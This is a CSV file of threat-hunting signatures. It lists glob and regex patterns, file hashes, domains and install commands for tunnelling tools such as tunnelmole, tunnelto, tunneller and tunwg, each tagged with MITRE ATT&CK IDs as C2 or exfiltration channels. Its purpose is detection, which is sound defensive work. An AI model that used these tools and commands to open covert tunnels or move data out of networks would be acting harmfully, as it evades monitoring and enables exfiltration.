"*b56153a4717acef3981496c1b7612efb801ce9b90ec941f1ebf69026d7fbbe20*",".{0,1000}b56153a4717acef3981496c1b7612efb801ce9b90ec941f1ebf69026d7fbbe20.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*b99def34d979c04dd81857a6ba93e79d8a16bcefecc8f4607e3c1cee097f41c1*",".{0,1000}b99def34d979c04dd81857a6ba93e79d8a16bcefecc8f4607e3c1cee097f41c1.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*c3a41b08c2665cc4036b9540ee39aa4a0786ed2416f03fe2ae5429ef303f409e*",".{0,1000}c3a41b08c2665cc4036b9540ee39aa4a0786ed2416f03fe2ae5429ef303f409e.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*ce9e92734048598d84c3ca3a1da32ecdf759e43b3e13716bf0bf91183c7544f2*",".{0,1000}ce9e92734048598d84c3ca3a1da32ecdf759e43b3e13716bf0bf91183c7544f2.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*d49e100ae7518571c6b4953693cc63e975072203787c492f389326ea3b1e988f*",".{0,1000}d49e100ae7518571c6b4953693cc63e975072203787c492f389326ea3b1e988f.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*eefd30efe33687408541ad00fead452f4f341c32fad1a77e84006ae7aa4fbe9a*",".{0,1000}eefd30efe33687408541ad00fead452f4f341c32fad1a77e84006ae7aa4fbe9a.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*efa4485dbd9d5813411e35144b17f676459fb681dc67c5a84d61da68f77099f8*",".{0,1000}efa4485dbd9d5813411e35144b17f676459fb681dc67c5a84d61da68f77099f8.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*Launch the client, exposing a local service to the internet*",".{0,1000}Launch\sthe\sclient,\sexposing\sa\slocal\sservice\sto\sthe\sinternet.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*skx/tunneller*",".{0,1000}skx\/tunneller.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*You must specify the local host:port to expose*",".{0,1000}You\smust\sspecify\sthe\slocal\shost\:port\sto\sexpose.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*hoapmlpnmpaehilehggglehfdlnoegck*",".{0,1000}hoapmlpnmpaehilehggglehfdlnoegck.{0,1000}","greyware_tool_keyword","Tunnello VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"* tunnelmole.bundle.js*",".{0,1000}\stunnelmole\.bundle\.js.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","0","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z"
"*.bin/tmole*",".{0,1000}\.bin\/tmole.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","0","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z"
"*.bin/tunnelmole*",".{0,1000}\.bin\/tunnelmole.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","0","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z"
"*/bin/tunnelmole.js*",".{0,1000}\/bin\/tunnelmole\.js.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","0","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z"
"*/tunnelmole.js*",".{0,1000}\/tunnelmole\.js.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","0","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z"
"*/tunnelmole-client.git*",".{0,1000}\/tunnelmole\-client\.git.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","1","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z"
"*/tunnelmole-service*",".{0,1000}\/tunnelmole\-service.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","1","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z"
"*/tunnelmole-service.git*",".{0,1000}\/tunnelmole\-service\.git.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","1","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z"
"*\.tmole.sh\*",".{0,1000}\\\.tmole\.sh\\.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","0","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z"
"*\tmole.exe*",".{0,1000}\\tmole\.exe.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","0","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z"
"*\tunnelmole.bundle.js*",".{0,1000}\\tunnelmole\.bundle\.js.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","0","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z"
"*25191b226ad7ef139f81890c531b0c606c5645bbca6f149b3679b06c73e6cddc*",".{0,1000}25191b226ad7ef139f81890c531b0c606c5645bbca6f149b3679b06c73e6cddc.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","0","#filehash","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z"
"*2b4328c30b58ecaf6febe1d7225b543b8886dcb4d8295be5973e6dc36f62c0f2*",".{0,1000}2b4328c30b58ecaf6febe1d7225b543b8886dcb4d8295be5973e6dc36f62c0f2.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","0","#filehash","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z"
"*dashboard.tunnelmole.com*",".{0,1000}dashboard\.tunnelmole\.com.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","1","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z"
"*f38fg.tunnelmole.net*",".{0,1000}f38fg\.tunnelmole\.net.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","1","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z"
"*http://*.tunnelmole.net*",".{0,1000}http\:\/\/.{0,1000}\.tunnelmole\.net.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","1","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z"
"*https://*.tunnelmole.net*",".{0,1000}https\:\/\/.{0,1000}\.tunnelmole\.net.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","1","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z"
"*https://tunnelmole.com/docs*",".{0,1000}https\:\/\/tunnelmole\.com\/docs.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","1","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z"
"*https://tunnelmole.com/downloads/tmole.exe*",".{0,1000}https\:\/\/tunnelmole\.com\/downloads\/tmole\.exe.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","0","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z"
"*install.tunnelmole.com",".{0,1000}install\.tunnelmole\.com","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","1","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z"
"*node tunnelmole.js*",".{0,1000}node\stunnelmole\.js.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","0","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z"
"*npm install -g tunnelmole*",".{0,1000}npm\sinstall\s\-g\stunnelmole.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","0","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z"
"*npm install* tunnelmole*",".{0,1000}npm\sinstall.{0,1000}\stunnelmole.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","0","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z"
"*--output tmole.exe*",".{0,1000}\-\-output\stmole\.exe.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","0","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z"
"*robbie-cahill/tunnelmole-client*",".{0,1000}robbie\-cahill\/tunnelmole\-client.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","1","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z"
"*service.tunnelmole.com*",".{0,1000}service\.tunnelmole\.com.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","1","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z"
"*tmole - Share your local server with a Public URL*",".{0,1000}tmole\s\-\sShare\syour\slocal\sserver\swith\sa\sPublic\sURL.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","0","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z"
"*tmole --set-api-key *",".{0,1000}tmole\s\-\-set\-api\-key\s.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","0","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z"
"*'Tunnelmole Service listening on http port *",".{0,1000}\'Tunnelmole\sService\slistening\son\shttp\sport\s.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","0","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z"
"*Tunnelmole Service listening on websocket port *",".{0,1000}Tunnelmole\sService\slistening\son\swebsocket\sport\s.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","0","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z"
"*tunnelmole/cjs*",".{0,1000}tunnelmole\/cjs.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","0","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z"
"*TUNNELMOLE_TELEMETRY*",".{0,1000}TUNNELMOLE_TELEMETRY.{0,1000}","greyware_tool_keyword","tunnelmole-client","tmole - Share your local server with a Public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/robbie-cahill/tunnelmole-client/","1","0","N/A","N/A","10","10","1187","75","2024-07-11T23:49:01Z","2023-02-08T08:27:57Z"
"* install tunnelto*",".{0,1000}\sinstall\stunnelto.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","0","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z"
"*""User-Agent"", ""tunnelto-client""*",".{0,1000}\""User\-Agent\"",\s\""tunnelto\-client\"".{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","0","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z"
"*../tunnelto_lib*",".{0,1000}\.\.\/tunnelto_lib.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","0","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z"
"*.tunnelto.dev*",".{0,1000}\.tunnelto\.dev.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","1","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z"
"*/tunnelto.git*",".{0,1000}\/tunnelto\.git.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","1","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z"
"*/tunnelto/releases/latest*",".{0,1000}\/tunnelto\/releases\/latest.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","1","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z"
"*/tunnelto_server*",".{0,1000}\/tunnelto_server.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","1","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z"
"*/tunnelto_server/*",".{0,1000}\/tunnelto_server\/.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","1","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z"
"*/tunnelto_server:*",".{0,1000}\/tunnelto_server\:.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","0","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z"
"*@tunnelto.dev*",".{0,1000}\@tunnelto\.dev.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","0","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z"
"*\.tunnelto\key.token*",".{0,1000}\\\.tunnelto\\key\.token.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","0","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z"
"*84a0a90cde73607684db0142f2d9cd8e636f089514eba57835ec10806d8f5f4b*",".{0,1000}84a0a90cde73607684db0142f2d9cd8e636f089514eba57835ec10806d8f5f4b.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","0","#filehash","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z"
"*99736bcb172f9cbed127f25a80a6b91fe355c4673461878962d7b5ac94782db1*",".{0,1000}99736bcb172f9cbed127f25a80a6b91fe355c4673461878962d7b5ac94782db1.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","0","#filehash","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z"
"*agrinman/tap/tunnelto*",".{0,1000}agrinman\/tap\/tunnelto.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","1","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z"
"*agrinman/tunnelto*",".{0,1000}agrinman\/tunnelto.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","1","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z"
"*--bin tunnelto*",".{0,1000}\-\-bin\stunnelto.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","0","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z"
"*--bin tunnelto_server*",".{0,1000}\-\-bin\stunnelto_server.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","0","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z"
"*--bin=tunnelto*",".{0,1000}\-\-bin\=tunnelto.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","0","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z"
"*--bin=tunnelto_server*",".{0,1000}\-\-bin\=tunnelto_server.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","0","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z"
"*cb70ca2937afdb647a8716f0b0d122f71f91dd7ce777250d0d2573f0ec47c5fc*",".{0,1000}cb70ca2937afdb647a8716f0b0d122f71f91dd7ce777250d0d2573f0ec47c5fc.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","0","#filehash","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z"
"*f6e06ec835c02ff1f08cc12c77b067bce8eddd96b9015cefef250353c89e1fbd*",".{0,1000}f6e06ec835c02ff1f08cc12c77b067bce8eddd96b9015cefef250353c89e1fbd.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","0","#filehash","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z"
"*ghcr.io/agrinman/tunnelto*",".{0,1000}ghcr\.io\/agrinman\/tunnelto.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","1","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z"
"*tunnelto inspector*",".{0,1000}tunnelto\sinspector.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","0","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z"
"*tunnelto --port *",".{0,1000}tunnelto\s\-\-port\s.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","1","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z"
"*tunnelto_server/src/*",".{0,1000}tunnelto_server\/src\/.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","1","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z"
"*tunnelto-linux.tar.gz*",".{0,1000}tunnelto\-linux\.tar\.gz.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","1","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z"
"*tunnelto-windows.exe*",".{0,1000}tunnelto\-windows\.exe.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","1","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z"
"*wormhole.tunnelto.dev*",".{0,1000}wormhole\.tunnelto\.dev.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","1","N/A","N/A","10","10","2085","113","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z"
"* tunwg.exe*",".{0,1000}\stunwg\.exe.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","N/A","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z"
"*./tunwg --*",".{0,1000}\.\/tunwg\s\-\-.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","N/A","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z"
"*.l.tunwg.com*",".{0,1000}\.l\.tunwg\.com.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","1","N/A","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z"
"*/bin/tunwg*",".{0,1000}\/bin\/tunwg.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","0","N/A","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z"
"*/latest/download/tunwg*",".{0,1000}\/latest\/download\/tunwg.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","1","N/A","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z"
"*/tunwg.exe*",".{0,1000}\/tunwg\.exe.{0,1000}","greyware_tool_keyword","tunwg","End to end encrypted secure tunnel to local servers","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ntnj/tunwg","1","1","N/A","N/A","10","10","210","8","2024-06-07T10:34:56Z","2023-01-16T17:51:13Z"
